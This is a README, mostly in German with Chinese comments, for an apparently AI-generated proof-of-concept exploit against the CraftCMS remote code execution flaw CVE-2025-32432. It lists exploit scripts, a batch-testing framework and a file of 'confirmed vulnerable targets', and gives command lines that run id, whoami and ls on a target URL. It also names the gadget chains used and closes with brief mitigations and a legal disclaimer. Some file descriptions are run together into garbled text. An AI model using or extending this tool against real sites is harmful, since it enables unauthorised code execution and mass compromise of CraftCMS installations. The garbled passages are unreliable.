
Der von KI reparierte/generierte poc für CVE-2025-32432
Ein Exploit-Tool für die CraftCMS Remote-Code-Execution-Schwachstelle, basierend auf der Forschung von SensePost.
final_poc.py - Final optimierter POC
test.py - Vereinfachte Version basierend auf dem ursprünglichen SensePost-Artikel
yii\rbac\PhpManager-Methodeautomated_testing.py - Automatisiertes Test-Framework
exploit_summary.md - Zusammenfassung der Schwachstellenanalysetest_results.json - Ergebnisse der automatisierten Testsvulnerable.txt - Liste der bestätigt verwundbaren Ziele# 基本POC测试
python3 final_poc.py https://target.com/ id
# 调试模式
python3 final_poc.py https://target.com/ "whoami" --debug
# 简化版本
python3 test.py https://target.com/ "ls -la"
# 创建目标文件
python3 automated_testing.py --create-targets
# 运行批量测试
python3 automated_testing.py
GuzzleHttp\Psr7\FnStream, um phpinfo() aufzurufenyii\rbac\PhpManager, um PHP-Code aus Session-Dateien zu ladenCraftCMS aktualisieren auf eine gepatchte Version:
Site Lock aktivieren, um das Admin-Panel zu schützen
Zugriffsrechte für Session-Dateien einschränken
WAF-Regeln bereitstellen, um bösartige Payloads zu erkennen
Dieses Tool ist ausschließlich für Sicherheitsforschung und autorisierte Penetrationstests bestimmt. Anwender müssen die lokalen Gesetze und Vorschriften einhalten und dürfen es nicht für illegale Zwecke verwenden.